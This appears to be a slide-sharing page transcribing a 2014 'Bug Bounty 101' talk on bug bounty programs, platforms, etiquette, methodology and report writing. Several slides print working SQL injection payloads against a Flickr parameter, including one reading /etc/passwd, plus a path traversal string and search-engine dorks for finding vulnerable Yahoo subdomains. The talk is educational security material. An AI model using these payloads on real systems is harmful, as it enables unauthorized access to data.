Abstract image of a woman sitting on books and studying on a laptop

Nbt con december-2014-slides

Download as PPTX, PDF
Behrouz Sadeghipour, profile picture
Behrouz Sadeghipour

The document provides an overview of bug bounty programs, including popular programs from Google, Yahoo, Facebook, and Microsoft. It discusses bug bounty platforms like Bugcrowd, Crowdcurity, HackerOne and SYNACK. The document offers tips for researchers on how to effectively find bugs, write quality reports, maximize payouts, and learn from other experienced researchers. The goal of bug bounty programs is to improve security by rewarding researchers for responsibly disclosing vulnerabilities.

1 of 36
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Bug Bounty 101 (Web Applications) BEN SADEGHIPOUR (@NAHAMSEC) HTTP://NAHAMSEC.COM
Nbt con december-2014-slides
Why bug bounties?  Chances of finding bugs to put on your resume.  Possibility of getting a job in the industry.  Opportunity to make money while attending college.  Less security breaches (hopefully).  Better and more secure apps.  More researchers from all over the world.  More experience.  More bugs.
What are some popular programs?
What are some popular programs?  Google:  Min. payout: $1337  Acquisitions’ min. payout: $100 Max. payout: $20,000
Google XXE (Costume XML)
Google XXE
What are some popular programs? Yahoo: Min. payout: $50 Max. payout: $15,000
Flickr SQL Injection  PAYLOAD: order_id=-116564954 union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables– -
Did I say SQL Injection? Remote Command execution PAYLOAD: order_id=-116564954 union select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15– -
What are some popular programs? Facebook: Min. payout: $500 Max. payout: Unknown (Million dollars?) Not enough details published by researcher
What are some popular programs?  Microsoft (Online services): Started on September 23, 2014 Min. payout: $500 Max. payout: Unknown
What are some popular programs?  GitHub  PayPal and Magento  Twitter  Square  cPanel/WHMCS Complete list: https://bugcrowd.com/list-of-bug-bounty-programs
What are some popular platforms?
What are some popular platforms?  BugCrowd  Managed or unmanaged programs  13,300 Researchers from all over the world  155 Bounties.  30,000+ Submissions.  Max Single Payout: $13,000.
What are some popular platforms?  CrowdCurity  Web application security  Main focus on bitcoin  ~1500 Researchers
What are some popular platforms?  SYNACK  Customer details: unknown.  Number of researchers: unknown .  Requires a written and a practical test.  Focused on Web application as well as:  Host  Mobile  Reverse Engineering  Hardware
What are some popular platforms?  HackerOne  “Security Inbox”.  1,004 Hackers thanked.  71 Public programs.  $1.58M Bounties paid.  4,987 Bugs fixed  Internet bug bounty:  PHP  Ruby  Apache.  Etc.
The Basics of Bug Bounties.  Read the program rules.  Scope of the program.  Payout per based on bug type.  Requirements  How to get an account on their platform?  Respect the program’s decisions.  Respect other researchers.  Quality vs Quantity.  Reputation in the industry.  Don’t make any threats.  Don’t ask for money or “swag” if it’s not mentioned in the rules.  Don’t compare two programs.  Two programs = different budgets.  Don’t lie while comparing two programs.  Don’t audit without permission.  Legal issues.
Quality vs Quantity  Most programs have an accurate reputation system  Google.  PayPal.  Facebook  BugCrowd (accuracy).  HackerOne (reputation).  Better reputation = more opportunities:  Private events.  Private Programs.
More isn’t always better. Total points VS. Accuracy
Maximizing your payout  Don’t doubt yourself.  You may still be the first to find it.  Check Everything!  Every parameter  Every POST request  User input validation  Forms  Profile pages.  Filters (Can you bypass it?)  Don’t go for the low hanging fruits:  Higher payout for critical vulnerabilities.  You may find some low severity bugs while looking for more critical ones.  Less chances of duplicates.
Methodology  Pick a target.  Pick an application.  Pick a vulnerability type.  Google:  site:tw.*.yahoo.com -news -sports - knowledge -house -travel -money - fashion -dictionary -charity -autos - emarketing -maps -serviceplus - screen -tech -mail -talk -bid -uwant - stock -mall -buy -myblog -movies - games -safely -bigdeals -finance - info -mobile -help
Pick up a pattern  Look for the same parameter, functionality, file type or file name in the same or other subdomains of the website.  3 SQL Injection on Yahoo by using Google.  Site:hk.*.yahoo.com + inurl:”id” + filetype:html  Try the same idea with other programs.  Profit!
Picking up a pattern? (Not my sponsors. Just vulnerable to the same bug)
Ruby on Rails  File Name Enumeration:  ../../../../../../etc/passwd  Possbile Full path disclosure (FPD)  File not found vs 404?  CVE-2014-7829
Making a Report  Be very specific.  Provide step-by-step instructions.  Include all the details needed in order to reproduce the issue.  Provide an attack scenario.  Why is it a big deal?  Can you access major private data?  Are you targeting a single use?  Provide screenshots if needed.  If you create a video, make it accurate, quick, and professional
Good vs. Bad  Don’t copy and paste others’ published reports  Program #1 by reporter #1 (18 days ago)
Good vs. Bad  Program #2, Reporter #2 (Reported 11 days ago)
Original report  Original report on HackerOne (Reported a month ago)
Details! http://blog.bugcrowd.com
Public Disclosure  Ask for permission before you publish anything  Varies with each program  BugCrowd – Just ask for each program.  HackerOne – Request public disclosure.  Email.  Some may decide not to disclose the vulnerability due to sensitive information.  Example Yahoo:  Configurations  Path  Internal IP addresses  Username/Password
Future of Bug Bounties  More and more companies will start to offer bounties (hopefully!)  Amazon  Apple  eBay  Sony (Surprise!!)  More companies offering money and not “swag”.  Less free bugs.
Achievements from Bug Bounties  Connections.  Free services from different companies.  Job offer(s).  Some cash.  Lots of experience.
Learn from your peers!  Read on how others are approaching different vulnerabilities:  @Securatary (http://uzbey.com/bbp-funding)  @FransRosen (http://detectify.com)  @BitQuark (http://bitquark.co.uk)  @Fin1te (http://fin1te.net)  More awesome researchers:  http://Bugcrowd.com/leaderboard  https://www.crowdcurity.com/hall-of-fame  http://Hackerone.com/thanks
Questions? BEN SADEGHIPOUR (@NAHAMSEC) HTTP://NAHAMSEC.COM

More Related Content

PPTX
Crypto Night at CSUS - Bug Bounties
Behrouz Sadeghipour
 
PPTX
Nbt con december-2014-slides
Behrouz Sadeghipour
 
PDF
Bug Bounty Hunter's Manifesto V1.0
Dinesh O Bareja
 
PPTX
Open Source CMS : How secure are they?
Yassine Aboukir
 
PDF
Bug Bounty Secrets
n|u - The Open Security Community
 
PPTX
Bug bounty programs
Yassine Aboukir
 
PDF
Bug bounty programs
Dan Vasile
 
PPTX
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Crypto Night at CSUS - Bug Bounties
Behrouz Sadeghipour
 
Nbt con december-2014-slides
Behrouz Sadeghipour
 
Bug Bounty Hunter's Manifesto V1.0
Dinesh O Bareja
 
Open Source CMS : How secure are they?
Yassine Aboukir
 
Bug Bounty Secrets
n|u - The Open Security Community
 
Bug bounty programs
Yassine Aboukir
 
Bug bounty programs
Dan Vasile
 
Bug Bounty #Defconlucknow2016
Shubham Gupta
 

What's hot (20)

PDF
Bug Bounty - Hackers Job
Arbin Godar
 
PDF
Writing vuln reports that maximize payouts - Nullcon 2016
bugcrowd
 
PDF
Android mobile app security offensive security workshop
Abhinav Sejpal
 
PPTX
Bug Bounty 101
Shahee Mirza
 
PPTX
Owasp2013 johannesullrich
drewz lin
 
PPTX
XSS (Cross Site Scripting)
Shubham Gupta
 
PPT
Edinburgh
Colin McLean
 
PPTX
Bug bounty
n|u - The Open Security Community
 
PPTX
3. backup file artifacts - mazin ahmed
Rashid Khatmey
 
PDF
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
PDF
Owasp advanced mobile-application-code-review-techniques-v0.2
drewz lin
 
PDF
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Marco Balduzzi
 
PPTX
OWASP A7 and A8
Pavan M
 
PPTX
Quantified Self On A Budget
Ernesto Ramirez
 
PPTX
Maturation of the Twitter Ecosystem
Kevin Makice
 
PDF
Formal, Executable Semantics of Web Languages: JavaScript and PHP
FACE
 
PPTX
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
HackerOne
 
PDF
GoSec 2015 - Protecting the web from within
IMMUNIO
 
PDF
Bug bounty or beg bounty?
Casey Ellis
 
PPTX
A7 Missing Function Level Access Control
stevil1224
 
Bug Bounty - Hackers Job
Arbin Godar
 
Writing vuln reports that maximize payouts - Nullcon 2016
bugcrowd
 
Android mobile app security offensive security workshop
Abhinav Sejpal
 
Bug Bounty 101
Shahee Mirza
 
Owasp2013 johannesullrich
drewz lin
 
XSS (Cross Site Scripting)
Shubham Gupta
 
Edinburgh
Colin McLean
 
Bug bounty
n|u - The Open Security Community
 
3. backup file artifacts - mazin ahmed
Rashid Khatmey
 
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Owasp advanced mobile-application-code-review-techniques-v0.2
drewz lin
 
Behind the scene of malware operators. Insights and countermeasures. CONFiden...
Marco Balduzzi
 
OWASP A7 and A8
Pavan M
 
Quantified Self On A Budget
Ernesto Ramirez
 
Maturation of the Twitter Ecosystem
Kevin Makice
 
Formal, Executable Semantics of Web Languages: JavaScript and PHP
FACE
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
HackerOne
 
GoSec 2015 - Protecting the web from within
IMMUNIO
 
Bug bounty or beg bounty?
Casey Ellis
 
A7 Missing Function Level Access Control
stevil1224
 
Ad

Similar to Nbt con december-2014-slides (20)

PDF
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
Abhinav Mishra
 
PPTX
Basics of getting Into Bug Bounty Hunting
Muhammad Khizer Javed
 
PPTX
Web Application Security And Getting Into Bug Bounties
kunwaratul hax0r
 
PDF
Testers, get into security bug bounties!
eusebiu daniel blindu
 
PPTX
Getting_Started_with_Bug_Bounty program.
glcrushgaming
 
PPTX
Bug bounties - cén scéal?
Ciaran McNally
 
PDF
Bug Bounty Guide Tools and Resource.pdf
hacktube5
 
PDF
Yet another talk on bug bounty
vinoth kumar
 
PDF
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
PDF
BugBounty Roadmap with Mohammed Adam
Mohammed Adam
 
PDF
Owasp LA
leifdreizler
 
PDF
Bug Bounty Blueprint : A Beginner's Guide
Varun Mithran
 
PDF
Hackfest presentation.pptx
Peter Yaworski
 
PPTX
HI THIS IS URGENT PLZ FIX ASAP: Critical Vunlerabilities and Bug Bounty Programs
bugcrowd
 
PPTX
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
PPTX
Saying Hello to Bug Bounty
Null Bhubaneswar
 
PPTX
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
kumarpriyanshu81
 
PDF
Bug Bounty Career.pdf
Vishal318796
 
PPTX
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Avi Sharma
 
PDF
Fun & profit with bug bounties
n|u - The Open Security Community
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
Abhinav Mishra
 
Basics of getting Into Bug Bounty Hunting
Muhammad Khizer Javed
 
Web Application Security And Getting Into Bug Bounties
kunwaratul hax0r
 
Testers, get into security bug bounties!
eusebiu daniel blindu
 
Getting_Started_with_Bug_Bounty program.
glcrushgaming
 
Bug bounties - cén scéal?
Ciaran McNally
 
Bug Bounty Guide Tools and Resource.pdf
hacktube5
 
Yet another talk on bug bounty
vinoth kumar
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
BugBounty Roadmap with Mohammed Adam
Mohammed Adam
 
Owasp LA
leifdreizler
 
Bug Bounty Blueprint : A Beginner's Guide
Varun Mithran
 
Hackfest presentation.pptx
Peter Yaworski
 
HI THIS IS URGENT PLZ FIX ASAP: Critical Vunlerabilities and Bug Bounty Programs
bugcrowd
 
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir
 
Saying Hello to Bug Bounty
Null Bhubaneswar
 
HackerOne X IoT Lab Bug Bounty 101 with Encryptsaan & IoT Lab at KIIT Univers...
kumarpriyanshu81
 
Bug Bounty Career.pdf
Vishal318796
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Avi Sharma
 
Fun & profit with bug bounties
n|u - The Open Security Community
 
Ad

Nbt con december-2014-slides

  • 1. Bug Bounty 101 (Web Applications) BEN SADEGHIPOUR (@NAHAMSEC) HTTP://NAHAMSEC.COM
  • 3. Why bug bounties?  Chances of finding bugs to put on your resume.  Possibility of getting a job in the industry.  Opportunity to make money while attending college.  Less security breaches (hopefully).  Better and more secure apps.  More researchers from all over the world.  More experience.  More bugs.
  • 4. What are some popular programs?
  • 5. What are some popular programs?  Google:  Min. payout: $1337  Acquisitions’ min. payout: $100 Max. payout: $20,000
  • 8. What are some popular programs? Yahoo: Min. payout: $50 Max. payout: $15,000
  • 9. Flickr SQL Injection  PAYLOAD: order_id=-116564954 union select group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables– -
  • 10. Did I say SQL Injection? Remote Command execution PAYLOAD: order_id=-116564954 union select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15– -
  • 11. What are some popular programs? Facebook: Min. payout: $500 Max. payout: Unknown (Million dollars?) Not enough details published by researcher
  • 12. What are some popular programs?  Microsoft (Online services): Started on September 23, 2014 Min. payout: $500 Max. payout: Unknown
  • 13. What are some popular programs?  GitHub  PayPal and Magento  Twitter  Square  cPanel/WHMCS Complete list: https://bugcrowd.com/list-of-bug-bounty-programs
  • 14. What are some popular platforms?
  • 15. What are some popular platforms?  BugCrowd  Managed or unmanaged programs  13,300 Researchers from all over the world  155 Bounties.  30,000+ Submissions.  Max Single Payout: $13,000.
  • 16. What are some popular platforms?  CrowdCurity  Web application security  Main focus on bitcoin  ~1500 Researchers
  • 17. What are some popular platforms?  SYNACK  Customer details: unknown.  Number of researchers: unknown .  Requires a written and a practical test.  Focused on Web application as well as:  Host  Mobile  Reverse Engineering  Hardware
  • 18. What are some popular platforms?  HackerOne  “Security Inbox”.  1,004 Hackers thanked.  71 Public programs.  $1.58M Bounties paid.  4,987 Bugs fixed  Internet bug bounty:  PHP  Ruby  Apache.  Etc.
  • 19. The Basics of Bug Bounties.  Read the program rules.  Scope of the program.  Payout per based on bug type.  Requirements  How to get an account on their platform?  Respect the program’s decisions.  Respect other researchers.  Quality vs Quantity.  Reputation in the industry.  Don’t make any threats.  Don’t ask for money or “swag” if it’s not mentioned in the rules.  Don’t compare two programs.  Two programs = different budgets.  Don’t lie while comparing two programs.  Don’t audit without permission.  Legal issues.
  • 20. Quality vs Quantity  Most programs have an accurate reputation system  Google.  PayPal.  Facebook  BugCrowd (accuracy).  HackerOne (reputation).  Better reputation = more opportunities:  Private events.  Private Programs.
  • 21. More isn’t always better. Total points VS. Accuracy
  • 22. Maximizing your payout  Don’t doubt yourself.  You may still be the first to find it.  Check Everything!  Every parameter  Every POST request  User input validation  Forms  Profile pages.  Filters (Can you bypass it?)  Don’t go for the low hanging fruits:  Higher payout for critical vulnerabilities.  You may find some low severity bugs while looking for more critical ones.  Less chances of duplicates.
  • 23. Methodology  Pick a target.  Pick an application.  Pick a vulnerability type.  Google:  site:tw.*.yahoo.com -news -sports - knowledge -house -travel -money - fashion -dictionary -charity -autos - emarketing -maps -serviceplus - screen -tech -mail -talk -bid -uwant - stock -mall -buy -myblog -movies - games -safely -bigdeals -finance - info -mobile -help
  • 24. Pick up a pattern  Look for the same parameter, functionality, file type or file name in the same or other subdomains of the website.  3 SQL Injection on Yahoo by using Google.  Site:hk.*.yahoo.com + inurl:”id” + filetype:html  Try the same idea with other programs.  Profit!
  • 25. Picking up a pattern? (Not my sponsors. Just vulnerable to the same bug)
  • 26. Ruby on Rails  File Name Enumeration:  ../../../../../../etc/passwd  Possbile Full path disclosure (FPD)  File not found vs 404?  CVE-2014-7829
  • 27. Making a Report  Be very specific.  Provide step-by-step instructions.  Include all the details needed in order to reproduce the issue.  Provide an attack scenario.  Why is it a big deal?  Can you access major private data?  Are you targeting a single use?  Provide screenshots if needed.  If you create a video, make it accurate, quick, and professional
  • 28. Good vs. Bad  Don’t copy and paste others’ published reports  Program #1 by reporter #1 (18 days ago)
  • 29. Good vs. Bad  Program #2, Reporter #2 (Reported 11 days ago)
  • 30. Original report  Original report on HackerOne (Reported a month ago)
  • 32. Public Disclosure  Ask for permission before you publish anything  Varies with each program  BugCrowd – Just ask for each program.  HackerOne – Request public disclosure.  Email.  Some may decide not to disclose the vulnerability due to sensitive information.  Example Yahoo:  Configurations  Path  Internal IP addresses  Username/Password
  • 33. Future of Bug Bounties  More and more companies will start to offer bounties (hopefully!)  Amazon  Apple  eBay  Sony (Surprise!!)  More companies offering money and not “swag”.  Less free bugs.
  • 34. Achievements from Bug Bounties  Connections.  Free services from different companies.  Job offer(s).  Some cash.  Lots of experience.
  • 35. Learn from your peers!  Read on how others are approaching different vulnerabilities:  @Securatary (http://uzbey.com/bbp-funding)  @FransRosen (http://detectify.com)  @BitQuark (http://bitquark.co.uk)  @Fin1te (http://fin1te.net)  More awesome researchers:  http://Bugcrowd.com/leaderboard  https://www.crowdcurity.com/hall-of-fame  http://Hackerone.com/thanks
  • 36. Questions? BEN SADEGHIPOUR (@NAHAMSEC) HTTP://NAHAMSEC.COM